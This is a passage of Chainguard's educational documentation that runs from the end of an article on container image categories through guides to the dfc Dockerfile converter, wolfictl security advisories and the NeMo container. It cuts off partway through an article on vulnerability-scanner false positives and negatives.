latest build of a given image, and are always tagged as latest and latest-dev. You can access these images directly from Chainguard’s registry from the chainguard repository. For example, to download the cURL Starter image, you could run a command like the following: docker pull cgr.dev/chainguard/curl To access any other image, you will need to do so through your organization’s private Chainguard repository. The following example will pull the chainguard-base image from the chainguard.edu organization’s repository: docker pull cgr.dev/chainguard.edu/chainguard-base Note that you won’t have access to the organization’s repository used in this example, but if your organization has access to the chainguard-base image you will be able to pull this image using your organization’s repository name in place of chainguard.edu. Chainguard’s registry provides public access to all Starter images, and provides customer access for Production images after logging in and authenticating. For a complete list of Starter images that are currently available, check out the Starter category on Chainguard Containers Directory. Registered users can also access all Starter and available Production images in the Chainguard Console. After logging in you will be able to find all the currently available Starter Containers in the Public images tab. Production Containers The rest of Chainguard Containers, those that are not Starter images and not included in the free tier of images, are referred to as Production Containers. Production images are enterprise-ready images that come with patch SLAs and features such as Federal Information Processing Standard (FIPS) readiness and unique time-stamped tags. Unlike Starter images, which are typically paired with only the latest version of an upstream package, Production images offer specific major and minor versions of open source software. As with the Starter Container category, any container image considered a Production image will also fall into at least one of the other categories listed in this guide. To view the Production container images that your organization has access to, select the appropriate organization in the drop-down menu above the left-hand navigation and then click the Organization images tab. Base Containers Base Containers are meant to be extended by users with their own packages and applications. Examples include chainguard-base, Go, and Python. Chainguard is responsible for releasing fully-patched toolchains and Base Containers, while customers are responsible for patching any applications and dependencies they add to a Chainguard Container. It is recommended to use a fully-patched Chainguard toolchain image to build the application, and a fully-patched Chainguard Base container image to layer the final application on. When migrating to a Chainguard Base container image you should first check the images’s overview page on the Containers Directory for usage details and any compatibility notes. You should understand the libraries, runtime requirements, and operating system dependencies of the applications you plan to have running on the Base container image. It is a best practice to use the same versions of any languages or applications that will be running on the Chainguard Base container image as what is currently running in your environment. Do not upgrade language or application versions at the same time that you migrate. Following the migration, you should thoroughly test and monitor your application. If you need a package to use with your Chainguard Base Container, Wolfi packages are available using apk. Ensure you only use Wolfi packages, as Alpine APK’s are not compatible with Wolfi. Additionally, it is important to note that vendor-provided packages need to be glibc-based and their functionality should be fully tested along with the application. For additional tips, please refer to our guide on Troubleshooting apko Builds. Note: Base Containers often require more customization by the user. Be aware that Chainguard offers a customization platform called Custom Assembly to streamline this requirement without customers having to stand up their own custom pipelines. Application Containers In contrast with Base container images, which are intended to be built upon, Application Containers are designed to be used directly, often by plugging into systems like Helm. Some examples of Chainguard’s Application images include nginx, Fulcio, and apko. When it comes to maintaining Application container images, Chainguard is responsible for rebuilding the upstream project with the latest toolchain and patching static and dynamic dependencies where such a change is non-breaking. Customers are responsible for tracking a supported version of the Chainguard Container. When migrating to a Chainguard Application container image you should first check the image’s overview page on the Containers Directory for usage details and any compatibility notes. There may be user ID, permissions, or volume path differences with the Chainguard image that you should be aware of. It is a best practice to use the same version of the Chainguard Application container image as what is currently running in your environment. AI Container Artificial intelligence and machine learning (AI/ML) systems are used in a wide variety of high-stakes applications, including information retrieval, medical research, fraud identification, military operations, autonomous vehicle navigation, and more. If compromised by malicious actors, the consequences could be disastrous and far reaching. Due to their unique features and uses, these systems often pose a greater risk than traditional software systems. Chainguard offers a suite of CPU- and GPU-enabled AI Containers which can help to mitigate these risks. Some of these AI container images include NeMo, PyTorch, and TensorFlow. These images are hardened, minimal, and optimized for efficient AI development and deployment. By leveraging Chainguard AI Containers, organizations can confidently secure their AI infrastructure, streamline vulnerability management, and maintain high performance with low-to-zero vulnerabilities. Rather than starting with tens, dozens, or hundreds of CVEs in your application or pipeline, you start with a clean slate. To learn more about Chainguard’s AI Containers and their uses, we encourage you to check out our course on Securing the AI/ML Supply Chain. FIPS Containers FIPS — or, Federal Information Processing Standards — are publicly announced standards developed by the National Institute of Standards and Technology (NIST). Chainguard offers images that use FIPS-validated cryptographic software modules to help users ensure that their applications meet FIPS standards. Chainguard offers FIPS versions of many of its container images, so FIPS Containers will fall into more than one category. Some Chainguard container images with FIPS variants are nginx, PHP, and PyTorch. For more information, please refer to our conceptual article on FIPS Chainguard Containers. Container Image Type Considerations There is some overlap between the different container image categories outlined in this guide. For example, the PyTorch image is an AI image, but it is also part of our free tier, meaning it’s also a Starter image. Many customers purchase both Application and Base Containers. Note that it often takes more time to migrate your applications to a Base container image in comparison to an Application image due to the complexity of coordinating multiple teams, testing, and release schedules. We recommend starting with and migrating to Application container images first while your teams get trained and onboarded with Base container images. A common requirement for many customers is to add a company-specific certificate or other security related content. The three most common ways to accomplish this are: Using incert Running the update-ca-certificates utility within a Dockerfile Using the Java keytool utility within a Dockerfile The process of adding or updating certificates, configuring APK repositories, and implementing other organization-specific customizations into an image is commonly known as creating a “Golden Image”. This approach enables these standard modifications to be applied once and then distributed across all teams, thereby reducing the risk of errors and minimizing friction during the migration process. Learn More By reading this guide, you should have a better understanding of how Chainguard categorizes its container images and what these categories mean. To recap: Starter: Chainguard’s free tier of container images Base: Containers meant to be built upon Application: Containers meant to be run directly FIPS: Contain FIPS-validated cryptographic modules AI: Containers for running AI/ML workloads securely For more information on Chainguard Containers, please refer to the other resources in the About section. In particular, you may find our conceptual article on Chainguard’s Shared Responsibility Model to be of interest. --- ### Dockerfile Converter URL: https://edu.chainguard.dev/chainguard/migration/dockerfile-conversion/ Last Modified: April 30, 2025 Tags: Chainguard Containers, Product, Open Source Chainguard’s Dockerfile Converter (dfc) was designed to facilitate the process of porting existing Dockerfiles to use Chainguard Containers. The following platforms are currently supported: Alpine (apk) Debian / Ubuntu (apt, apt-get) Fedora / RedHat / UBI (yum, dnf, microdnf) For each FROM line in the Dockerfile, dfc attempts to replace the base image with an equivalent Chainguard Container. For each RUN line in the Dockerfile, dfc attempts to detect the use of a known package manager (e.g. apt / yum / apk) and extracts the names of any packages being installed. It then attempts to map these packages to Chainguard equivalent APKs. Additionally, dfc will add a USER root instruction to allow package installations since most Chainguard Containers run as a regular, non-root user. You can find more details about dfc’s mapping process on their GitHub repository, in the How it Works section of their README. Note: dfc is an open source tool that is still under active development and subject to changes. While we try to cover a variety of use case scenarios, some inconsistencies may occur due to the diverse nature of Dockerfiles and package manager instructions. There may be errors or gaps in functionality as you use the feature in the early access phase. Please let us know if you come across any issues or have any questions.You can file an issue on GitHub to get in touch. Installation You’ll need a Go environment to install and run dfc. To install it on your local system, run: go install github.com/chainguard-dev/dfc@latest To verify that the installation was successful, run: dfc --help You will receive output with basic usage instructions. Usage: dfc [flags] Examples: dfc <path_to_dockerfile> Flags: -h, --help help for dfc -i, --in-place modified the Dockerfile in place (vs. stdout), saving original in a .bak file --json print dockerfile as json (pre-conversion) --org string the root repo namespace at cgr.dev/<org> (default "ORGANIZATION") Basic Usage Unless specified, dfc will not make any direct changes to your Dockerfile, writing the results to the default output stream. Run the following to convert a Dockerfile and save the output to a new file: dfc ./Dockerfile > ./Dockerfile.converted You can also pipe the Dockerfile’s contents from stdin: cat ./Dockerfile | dfc - The following CLI flags are available: --org=<org> - the registry namespace, i.e. cgr.dev/<org> (default placeholder: ORGANIZATION) --json - serialize Dockerfile as JSON --in-place / -i - modify the Dockerfile in place vs. printing to stdout, saving original in a .bak file Examples This section has a few practical examples you can use as reference. Setting the ORG By default, dfc uses ORG as a placeholder for the image registry address. You can provide the --org parameter to specify the organization that you’re a member of. To use free tier images, use chainguard as the organization. Consider the following Dockerfile for a CLI PHP application: FROMphp:8.2-cliRUN apt-get update && apt-get install -y \ git \ curl \ libxml2-dev \ zip \ unzip# Install Composer and set up applicationCOPY --from=composer:latest /usr/bin/composer /usr/bin/composerRUN mkdir /applicationCOPY . /application/RUN cd /application && composer installENTRYPOINT [ "php", "/application/minicli" ]The following command will convert this Dockerfile to use Chainguard Containers, using the chainguard organization for the free tier images. The output will be redirected to a new file called Dockerfile.new: dfc Dockerfile > Dockerfile.new --org chainguard The modified file will now use cgr.dev/chainguard/php:latest-dev as base image: FROM cgr.dev/chainguard/php:latest-dev USER root RUN apk add -U curl git libxml2-dev unzip zip # Install Composer and set up application COPY --from=composer:latest /usr/bin/composer /usr/bin/composer RUN mkdir /application COPY . /application/ RUN cd /application && composer install ENTRYPOINT [ "php", "/application/minicli" ] Inline Usage With inline usage, you can convert single instructions or entire Dockerfiles. For example, to convert a single FROM line, you can run: echo "FROM node" | dfc --org chainguard.edu - This will give you the following result: FROM cgr.dev/chainguard.edu/node:latest-dev You can also convert single RUN directives such as the following: echo "RUN apt-get update && apt-get install -y nano" | dfc - Which will give you the following output: RUN apk add -U nano It is also possible to convert a whole Dockerfile using inline mode. Here we use a heredoc input stream to create the Dockerfile contents: cat <<DOCKERFILE | dfc --org chainguard.edu - FROM node RUN apt-get update && apt-get install -y nano DOCKERFILE This will convert to: FROM cgr.dev/chainguard.edu/node:latest-dev USER root RUN apk add -U nano Making In Place Changes By default, dfc will print the converted Dockerfile to stdout, and won’t make any changes to your original Dockerfile. You can use the --in-place flag to make dfc overwrite the original file. This will also create a .bak file to back up the original file contents. dfc Dockerfile --in-place 2025/03/14 14:54:21 saving dockerfile backup to Dockerfile.bak 2025/03/14 14:54:21 overwriting Dockerfile This method does not work with inline input. Working with JSON Output If you plan on using dfc programmatically, the JSON output can come in handy. For example, the following will convert an inline Dockerfile and output the results in JSON format, parsed by jq for readability: cat <<DOCKERFILE | dfc --org chainguard.edu --json - | jq FROM node RUN apt-get update && apt-get install -y nano DOCKERFILE { "lines": [ { "raw": "FROM node", "converted": "FROM cgr.dev/chainguard.edu/node:latest-dev\nUSER root", "stage": 1, "from": { "base": "node" } }, { "raw": "RUN apt-get update && apt-get install -y nano", "converted": "RUN apk add -U nano", "stage": 1, "run": { "distro": "debian", "manager": "apt-get", "packages": [ "nano" ] } }, { "raw": "" } ] } Check also the Useful jq formulas section from the dfc repository as reference on how to use jq to filter the JSON output. Using dfc as a Go Library You can import the package github.com/chainguard-dev/dfc/pkg/dfc and use it directly from Go code to parse and convert Dockerfiles on your own, without the dfc CLI. This way, you can integrate dfc into your own Go applications or scripts, which can be especially useful if you have a large number of Dockerfiles to convert or if you want to further customize the output produced by dfc. Check the Using from Go section on the dfc repository for examples on how to use it as a Go library. Learn More If you’d like to learn more about our Dockerfile Converter, including how to get involved with the project, you can check out the dfc repository on GitHub. We welcome contributions and feedback from the community. --- ### Using wolfictl to Manage Security Advisories URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/security-advisories/managing-advisories/ Last Modified: August 9, 2024 Tags: Product, Chainguard Containers, CVE Note: This document is deprecated as of June 2025. Chainguard operates its own Security Advisories page to alert users about the status of vulnerabilities found in Chainguard Containers. To maintain this database, we use wolfictl, a tool developed for working with the Wolfi un-distro. In this guide, you will walk through using wolfictl to create an advisory for a vulnerable package. You’ll also learn how to update this advisory as more information about the vulnerability is disclosed over time. To follow along, you will need to have git and the Go programming language installed on your machine. This guide will focus on the packages and advisories issued for Wolfi. How to Install wolfictl To work with security advisories, you will need to install the wolfictl tool onto your machine. First, execute the following command in your terminal to clone the wolfictl repository locally, and navigate to it. git clone git@github.com:wolfi-dev/wolfictl.git wolfictl && cd $_ Then, using go, install the wolfictl tool: go install If you encounter any errors during installation, your installed version of go may be out of date. You can check what version of go you have installed by running go version in your terminal. Check the go.mod file in the wolfictl repository to determine what version of go you will need, and be sure to update go to this version or a later release to continue. Alternatively, you may need to add the wolfictl binary to your $PATH after installation if your system does not recognize the command. You can verify that you have successfully installed wolfictl by executing the wolfictl version command in your terminal. wolfictl version A successful installation of wolfictl will display output similar to the following. Note that the exact output will vary over time as new wolfictl versions are released. __ __ ___ _ _____ ___ ____ _____ _ \ \ / / / _ \ | | | ___| |_ _| / ___| |_ _| | | \ \ /\ / / | | | | | | | |_ | | | | | | | | \ V V / | |_| | | |___ | _| | | | |___ | | | |___ \_/\_/ \___/ |_____| |_| |___| \____| |_| |_____| wolfictl: A CLI helper for developing Wolfi GitVersion: devel GitCommit: 6c98dc69a559192575d085d87fd916d8281dd67d GitTreeState: clean BuildDate: 2024-07-23T01:57:17 GoVersion: go1.22.5 Compiler: gc Platform: darwin/arm64 In the next section, you will complete your local setup so you can begin using the wolfictl tool to work with advisories. Cloning Package and Advisory Repositories Before you can interact with security advisories, the wolfictl tool will need access to existing Wolfi package and advisory information. You will need to clone two additional repositories: the wolfi-dev/os repository and the wolfi-dev/advisories repository. Execute the following commands to clone each of these repositories to your machine and then navigate to the advisories directory. git clone git@github.com:wolfi-dev/os.git git clone git@github.com:wolfi-dev/advisories.git && cd advisories With wolfictl installed and these two repositories cloned locally, you are now ready to interact with the security advisory database. Viewing Existing Advisories First we will take a look at the existing advisories issued for packages in Wolfi. Keep in mind that the results shown here, and on your own machine, are snapshots in time. You should regularly check for changes to the upstream repository as new packages and advisories are issued. You will be using the wolfictl advisory list command to view existing advisories. There are a variety of flags which you can append to assist in your search. -p lists all advisories for a given package name. -V lists all advisories for a given CVE ID, across all packages. -t lists all advisories by their most recent event type. -c lists all advisories by detected component type. --history reports the full list of events for displayed advisories. You can combine multiple flags together to conduct a more granular search. For a complete listing of available command options, you can run the wolfictl advisory list -h command in your terminal. For example, let’s say you want to find advisories for the glibc package as well as the full history of these advisories. wolfictl advisory list -p glibc --history The following shows a small sample of output from this command at the time of this writing. Note that the output of this command may change as vulnerability entries are added and updated over time. glibc CGA-49g3-q5cv-7m6g (CVE-2023-4527, GHSA-hmf7-f8gf-8f4p) 2023-09-22T14:14:01Z fixed (2.38-r2) CGA-573p-mg38-75fh (CVE-2019-1010024, GHSA-3q29-89cr-qgvj) 2023-03-06T13:22:06Z false positive (vulnerability-record-analysis-contested) CGA-57wh-hj4x-5342 (CVE-2023-4911, GHSA-m77w-6vjw-wh2f) 2023-10-03T22:58:32Z fixed (2.38-r5) CGA-5vfg-gqch-hcj5 (CVE-2010-4756, GHSA-x2r9-jfjp-jvp9) 2023-03-06T17:47:28Z false positive (vulnerability-record-analysis-contested) 2024-07-26T16:49:42Z fixed (2.40-r0) CGA-7fr2-v9gg-pg28 (CVE-2024-33600, GHSA-jv3g-6pg3-v9j8) 2024-05-14T11:00:51Z detected (glibc) 2024-05-15T04:40:16Z fixed (2.39-r5) … From this snapshot, you can get an idea of the timeline of a vulnerability’s remediation process. For example, CVE-2024-33600 was detected on May 14th, 2024, and was remediated within the next 24 hours. Similar results are shown for other advisories, including the versions of the package in which the vulnerability was remediated. We encourage you to experiment with these flags to find what information you can gather from your various searches. Creating and Updating Advisories To begin creating and updating security advisories, you will need to navigate back to the Wolfi package repository you cloned. cd ../os Here, you will run the wolfictl advisory create command to begin the process of adding a new advisory. This command will respond with a few prompts in the terminal requesting input of information used to create the advisory. First, you will be asked to enter the package in which the CVE was found. For this demonstration we will use the glibc package. Then, you will be asked for the vulnerability ID that you wish to make an advisory for. This ID must be a CVE, CGA, GHSA, or Go vulnerability ID. Finally, you will be asked what the status for the advisory should be, from one of the following options: detection (Under investigation) true-positive-determination (Affected) fixed (Fixed) false-positive-determination (Not affected) fix-not-planned (Fix not planned) pending-upstream-fix (Pending upstream fix) To learn more about the meanings of each of these identifiers, please refer to our documentation on event types. The following shows an example of the wolfictl advisory create command in action. Please note that the vulnerability referenced is an arbitrary CVE ID for demonstration purposes and does not reflect an actual vulnerability found in the glibc package. Auto-detected distro: Wolfi Package: glibc Vulnerability: CVE-2024-57230 Type: detection You can now check that your advisory has been successfully added with the wolfictl advisory diff command, as follows: wolfictl advisory diff From this command, you can see the local addition of your new advisory for the glibc package. Auto-detected distro: Wolfi ( - removed / ~ modified / + added ) ~ document "glibc" + advisory "CGA-pwm8-5rj4-phww" Let’s say that you upgrade a vulnerable package to a newer, patched version. You are now ready to update the security advisory so its status is now “Fixed”. You can do so using the wolfictl advisory update command. Again, this command will walk you through the steps of updating an advisory by requesting information about the advisory you wish to modify. The following shows an example of this workflow in action. Auto-detected distro: Wolfi Package: glibc Vulnerability: CVE-2024-57230 Type: fixed Fixed Version: 2.39-r7 The same process can be followed for other status updates, whether you wish to mark a vulnerability as “Not affected” in the case of a false positive finding, “Fix not planned”, or another applicable status. Further Reading In this guide, you learned how to use the wolfictl tool to interact with Chainguard’s Security Advisories feed. You used wolfictl to explore existing advisories, and also created and updated a new security advisory. The steps shown in this guide allowed you to make local changes to your advisory feed. If you wish to contribute to the open-source Wolfi OS advisory feed, please read through our How To Patch CVEs guide and our How Chainguard Issues Security Advisories article first. Be sure to routinely check our Security Advisories page when your scanners pick up new CVEs in your images. If you want to learn more about how you can interpret a security advisory and what its status means for your security, read our article on using advisories. --- ### Getting Started with the NeMo Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/nemo/ Last Modified: March 24, 2025 Tags: Chainguard Containers, Product NeMo is a deep learning framework for building conversational AI models that provides standalone module collections for Automatic Speech Recognition (ASR), Natural Language Processing (NLP), and Text-to-Speech (TTS) tasks. The NeMo Chainguard Container is a comparatively lightweight NeMo environment with low to no CVEs, making it ideal for both training and production inference. The NeMo Chainguard Container is designed to work with the CUDA 12 parallel computing platform, and is suited to workloads that take advantage of connected GPUs. What is Deep Learning? Deep learning is a subset of machine learning that leverages a flexible computational architecture, the neural network, to address a wide variety of tasks. Neural networks emulate the structure of the brain and consist of interconnected nodes (neurons) that each contain an associated weight and threshold. In concert with an activation function, these values determine whether data is propagated within the network, producing an output layer corresponding to a classification, regression, or other result. By technical convention, a deep neural network (DNN) has at least three layers: an input layer, an output layer, and one or more hidden layers. In practice, DNNs often have many layers. Deep neural networks underpin many common computational tasks in modern applications, such as speech to text and generative AI. In this getting started guide, we will use the NeMo Chainguard Container to generate speech from plain text using models provided by NeMo’s text-to-speech (TTS) and natural language processing (NLP) collections. In doing so, we’ll compare the security and footprint of the NeMo Chainguard Container to the official runtime container image and consider further approaches and resources for applying the NeMo Chainguard Container to additional tasks in conversational AI. This guide is primarily designed for use in an environment with access to one or more NVIDIA GPUs. However, NeMo is built on PyTorch Lightning, which supports a wide variety of accelerators, or interfaces to categories of processing units (CPU, GPU, TPU) or high-level clustering mechanisms such as Distributed Data Parallel. Some consideration will be given to alternative computing environments such as CPU in this tutorial. Note: In November 2024, after this article was first written, Chainguard made changes to its free tier of container images. In order to access the non-free container images used in this guide, you will need to be part of an organization that has access to them. For a full list of container images that will remain in Chainguard's free tier, please refer to this support page. Prerequisites If Docker Engine (or Docker Desktop) is not already installed, follow the instructions for installing Docker Engine on your host machine. To take advantage of connected GPUs, you’ll need to install CUDA Toolkit on your host machine. Installing CUDA Toolkit Compute Unified Device Architecture (CUDA) is a parallel computing platform developed by NVIDIA. To take advantage of connected GPUs, you’ll need to follow the setup instructions for your local machine or create a CUDA-enabled instance on a cloud provider. To set up CUDA on your local machine, follow the installation instructions for Linux or Windows. CUDA is not currently supported on Mac OS. Google Cloud Platform provides CUDA-ready deep learning instances, including PyTorch-specific instructions. Amazon Web Services also provides CUDA-ready deep learning instances. This tutorial can be followed without connected GPUs or CUDA Toolkit. To run commands in this tutorial on CPU, omit the --gpus all flag when executing container commands. Keep in mind that some functionality within NeMo (such as training models) will take significantly longer on CPU. Testing Access to GPUs We’ll start by running the NeMo Chainguard Container interactively and determine whether the environment has access to connected GPUs. Use the following command to pull the container image, run it with GPU access, and start a Python interpreter inside the running container. docker run -it --rm \ --gpus all \ --shm-size=8g \ --ulimit memlock=-1 \ --ulimit stack=67108864 \ cgr.dev/$ORGANIZATION/nemo:latest Note: Be aware that you will need to change $ORGANIZATION to reflect the name of your organization’s repository within Chainguard’s registry. These options allow access to all available GPUs, allocate a custom amount of shared memory (8 GB) to the container, and set an upper bound on container memory use. Running this command for the first time may take a few minutes, since it will download the NeMo Chainguard Container to your host machine. Once the image is pulled and the command runs successfully, you will be interacting with a bash shell in the running container. Enter the following commands at the prompt to check the availability of your GPU. $ python Python 3.11.9 (main, May 1 2024, 21:48:03) [GCC 13.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> from nemo.core import pytorch_lightning >>> len(pytorch_lightning.accelerators.find_usable_cuda_devices()) 1 The above output shows that one GPU is connected and available. Since PyTorch is also accessible within our NeMo Chainguard Container, you can also use it to access more granular information on CUDA and attached GPUs. >>> import torch >>> torch.cuda.is_available() True >>> torch.cuda.get_device_name(0) 'Tesla V100-SXM2-16GB' Once you’ve determined that your environment has access to CUDA and connected GPUs, exit the container by typing Control-d or by typing exit() and pressing Enter. You should be returned to the prompt of your host machine. NeMo Overview NeMo is a generative AI toolkit and framework with a focus on conversational AI tasks such as NLP, ASR, and TTS, as well as large language models (LLM) and multimodal (MM) models. NeMo uses a system of neural modules, an abstraction over a variety of common elements in model training and inference such as encoders, decoders, loss functions, layers, or models. NeMo also provides collections of modules targeting specific areas of concern in conversational and generative AI, such as LLMs, speech AI / NLP, and TTS. NeMo is built on PyTorch Lightning, a high-level interface to PyTorch with a focus on scalability, and uses the Hydra library for configuration management. Since NeMo is a framework with many collections of modules suitable for a wide variety of projects, we’ve chosen an example task, generative text to speech, requiring the use of two TTS modules. This is an appropriate example of a task that might be run as part of a larger production application. Text to Speech (TTS) Example In this section, we’ll run a script that uses the NeMo Chainguard Container to: Start with a message in plain text Transform it into a set of phonemes Generate a spectrogram (waveform representation) using a NeMo-provided spectrogram model Transform the spectrogram values into audio using a NeMo-provided vocoder (human voice) model Write the resulting audio to a .wav file at a set rate First, let’s create a folder to work in on your host machine: mkdir -p ~/nemo-tts && cd ~/nemo-tts Next, let’s download our tts.py script: curl https://raw.githubusercontent.com/chainguard-dev/nemo-examples/main/tts.py > tts.py You should now be in a working directory containing only one file, tts.py. We’ll be mounting this folder in our container as a volume, which will allow us to both pass in our script and extract our output. We’ll now start a container based on our NeMo Chainguard Container, mount the current working directory containing our tts.py script inside the container as a volume, and run the script in the container: docker run -it --rm \ --gpus all \ --user root \ --shm-size=8g \ --ulimit memlock=-1 \ --ulimit stack=67108864 \ -v $PWD:/home/nonroot/nemo-test \ cgr.dev/$ORGANIZATION/nemo:latest \ "/home/nonroot/nemo-test/tts.py" Note that we ran the above script as root. This allows us to share the script and output .wav file between the host and container. Remember not to run your container image as root in a production environment. If your host machine does not have attached GPUs and you’d like to run the above on your CPU, omit the --gpus all \ line. The script tests for availability of the CUDA platform and sets the accelerator to CPU if CUDA is not detected, so the script will also function on CPU. Since we’re using pretrained models to perform text to speech, this example will only take a few minutes using a CPU only. However, other tasks such as model training and finetuning may take significantly longer without connected GPUs. Note that NeMo collections are large, and initial imports can take up to a minute depending on your environment. The script may appear to hang during that time. After imports are complete, you should see a large amount of output as NeMo pulls models and works through the steps in the script (tokenizing, generating a spectrogram, generating audio, and writing audio to disk). On completion, the script outputs a test.wav file. Because we mounted a volume, this file should now be present in the working directory of your host machine. ls test.wav tts.py The test.wav file should contain audio similar to this output: Output from the TTS script Final Considerations and Next Steps This section will consider next steps for applying the NeMo Chainguard Container to other tasks in conversational AI. In the tts.py script run above, we used two models provided by NeMo, both contained within the TTS collection. Tacotron2 speech synthesis model HiFi-GAN speech synthesis model The former model allows us to convert plain text into a spectrogram, or a representation of a waveform. The second model generates audio from the spectrogram. Note that NVIDIA’s model overview pages provide useful background information, tags, and sample code. You can search the full NGC model catalog to find pretrained models for use with NeMo. In this script, we used pretrained models to create the phonemes and audio output. These models can be finetuned with your own speech data to customize the results. NVIDIA hosts a tutorial on finetuning TTS models with NeMo. The following resources may give a starting point for further explorations with the NeMo Chainguard Container: NVIDIA provides a wide variety of NeMo Tutorials that are a strong entry point for working with the framework to accomplish specific tasks. NVIDIA’s NeMo Playbooks provide a basis for more advanced tasks and configurations and address running workloads on different platforms and orchestration tooling. The NeMo Collections organizes reference documentation for NeMo collections and modules. The NVIDIA NGC model catalog can be searched to find models suitable for specific tasks, and each model’s overview page provides a useful reference with sample code. This NVIDIA Conversational AI publications page collects papers that use the NeMo framework, showcasing cutting-edge generative deep learning using NeMo --- ### False Positives and False Negatives with Container Images Scanners URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/working-with-scanners/false-results/ Last Modified: September 14, 2023 Tags: CVE, Overview, Conceptual A vulnerability scanner is a tool that analyzes your software components and reports any CVEs it finds. Using a vulnerability scanner to find CVEs that impact your system is a critical step in software vulnerability remediation, but as you begin to triage scanner-reported vulnerabilities, you may find that your scanner’s results are not perfectly accurate. The goal of a vulnerability scanner is to identify the vulnerabilities that impact your container images, which can be considered true positive vulnerabilities. Sometimes, a scanner surfaces CVEs which are not actually impacting your images, which are called false positive vulnerabilities. Your scanner may even miss some vulnerabilities that are impacting you, termed false negative vulnerabilities. The presence of false positive and negative vulnerabilities can add a tricky layer to the vulnerability remediation process. False positive vulnerabilities can be “noisy” and distract you from remediating the vulnerabilities that are actively impacting your containers. Additionally, false negative vulnerabilities can silently affect you, making them a hidden threat to your container image security. This article aims to explain the formation of false positive and false negative vulnerabilities, allowing you to better understand what they mean, how they impact you, and how you can use tools to fine-tune your scanner to improve the accuracy of your scan results. How False Positives and False Negatives Occur Understanding how false positives and negatives occur first requires insight into how scanners operate. A vulnerability scanner starts by ingesting various vulnerability databases. A vulnerability database (such as the National Vulnerability Database) is home to information regarding causes, impacts, and security advisories for software vulnerabilities. A container image scanner will often use multiple vulnerability databases as references for what software components may be vulnerable. Different databases may focus on documenting vulnerabilities for certain software vendors or products. As a result, collecting vulnerability data from numerous sources allows a scanner to identify a more exhaustive selection of vulnerabilities across software components. When you conduct a vulnerability scan on your container images, the scanner attempts to detect what packages comprise the image. It does so by sifting through the images’ source code and files introduced by package managers in search of open source software components. If successful, the scanner collects key metadata (such as package names and versions) that can be referred to later. It will then compare this metadata with the various databases it references in an attempt to determine if any packages in the software are affected by vulnerabilities. Due to the complexity of cross-referencing image components against databases, scanners are not infallible. Sometimes vulnerabilities are misidentified — or even missed entirely. There are multiple ways in which this can occur throughout the scanning process from start to finish. Scanner-level Issues Vulnerability scanners may be unable to consistently detect container components, causing the results of scans to be incomplete or inaccurate. Scanners often rely on package managers and package metadata to catalog the parts of a container. If a scanner cannot collect complete information about package metadata the results of the scan may not reflect the true contents of the image. For example, if a package in a container is not tracked by a package manager, it may go undetected, so vulnerabilities contained within are not reported. For an in-depth discussion of how scanners fail to collect certain information, we encourage you to check out our blog post on “Software Dark Matter”. Program Scope Some reported vulnerabilities may be falsely positive because they are detected outside of the scope of your container images. For example, a container may have packages in it which have vulnerabilities, though the specific vulnerable functions may not be called or reachable by your images. As a result, these vulnerabilities may pop up in your scans despite your program not interacting with their vulnerable sources. It is worth noting that these false positive vulnerabilities could impact you if other vulnerabilities are leveraged to access them, so they are not negligible. However, such a situation arises infrequently as a result of the exploitation of other vulnerabilities, which are first in a line of defense. Missing or Mismatched Information Inconsistencies in package versioning conventions may cause scanners to fail in detecting the correct versions of your software components. Software vendors choose different version naming schemes for their products, so scanners may not easily detect what package versions are in use. Alternatively, missing or inconsistent data on vulnerable package versions in vulnerability databases can have a similar effect. In both cases, your scanner may struggle in correlating the package version in your container to package versions in vulnerability records, producing false positives and negatives where components are mismatched. SCA vs SAST Tools Software Composition Analysis (SCA) tools focus on the detection and assessment of open source software components, making them ideal for container image scans. SCA tools cross-reference package metadata with vulnerability databases to determine if vulnerabilities are present. However, in situations where SCA tools cannot match a package to its entries in a vulnerability database, false negatives can occur. Static Application Security Testing (SAST) tools scan your proprietary software to search for vulnerabilities. They provide guidance on how to modify code to resolve a given vulnerability. However, SAST tools lack context surrounding the software’s behavior at runtime, giving an incomplete analysis of how the software may function. Without a comprehensive view of the software’s anatomy and use, many false positive vulnerabilities occur in SAST scans. To learn how to choose the right scanner method for your application, check out this comparison of SCA and SAST scanning tools. Impacts of False Positives and False Negatives False positive vulnerabilities are red herrings: They look important, but take you away from the vulnerabilities which truly matter. Identifying what vulnerabilities are true and false positives can be difficult, as your false positive results are mixed in with other true positive finds. When dealing with hundreds of vulnerabilities, the costs of extensive triage and remediation [PDF] can add up fast. False negative vulnerabilities can have major impacts on a system if they are not discovered. They are a goldmine for attackers if they find them before you do. The successful exploitation of a false negative vulnerability can result in a zero-day attack. A zero-day attack occurs when an adversary exploits a vulnerability in software which the maintainer is unaware of. This can cause the attack to go unnoticed or unresolved until the vulnerability is discovered. Many infamous CVEs, such as Log4Shell, are examples of incredibly impactful zero-day vulnerabilities. The presence of false positive and negative vulnerabilities in your scans add another unnecessary layer of complexity to the remediation process. Having an unreliable scanner can increase the amount of time you spend filtering out false positive results, giving you less time to focus on the true positives affecting you. Additionally, an inconsistent scanner reduces your confidence in the completeness and accuracy of your scans, making it difficult to determine if false negatives are lurking among your containers. Reducing False Results Unfortunately, there is no single way to stop false positives and false negatives from occurring in your vulnerability scans. Triaging reported vulnerabilities will always be necessary to determine what vulnerabilities need to be addressed based on their severity. However, steps can be taken to reduce the overall number of false positive and negative results that surface. SBOMs, Purls, and VEX An SBOM, or Software Bill of Materials, is a helpful document that catalogs the packages and components of your software in a machine-readable format. Using an SBOM can improve your vulnerability scans as package information is stored in one place, so scanners don’t have to hunt down and risk missing component information throughout your software. There are different ways to generate an SBOM in order to improve their comprehensiveness and utility. To address the inconsistencies caused by software vendors using proprietary version naming schemes, adopting the purl specification can help. A purl, or package URL, aims to standardize versioning by outlining a convention that incorporates pertinent package information in every identifier. Using purls can reduce the number of false positives which surface by making it easier for scanners to align version information between data sources. Vulnerability Exploitability eXchange (VEX) [PDF] documents can provide helpful insight about the status of software vulnerabilities in a product. VEX documents allow developers to report the exploitability status of a vulnerability in a product through the use of identifiers. Using VEX can streamline the triage and remediation process by making it simpler to determine when action is needed for a given vulnerability. One way to leverage VEX documents is through OpenVEX, an open source implementation of the VEX specification. OpenVEX offers a set of tools to make ingesting and manipulating VEX documents easier. To learn more, check out our article on getting started with OpenVEX. Hardened Base Images A primary cause of large vulnerability counts reported in scanners is the dead weight caused by unnecessary dependencies. Many popular container images contain hundreds of packages, each with their own potential to introduce vulnerabilities, both true and false positives. Having so much noise to sift through draws out the 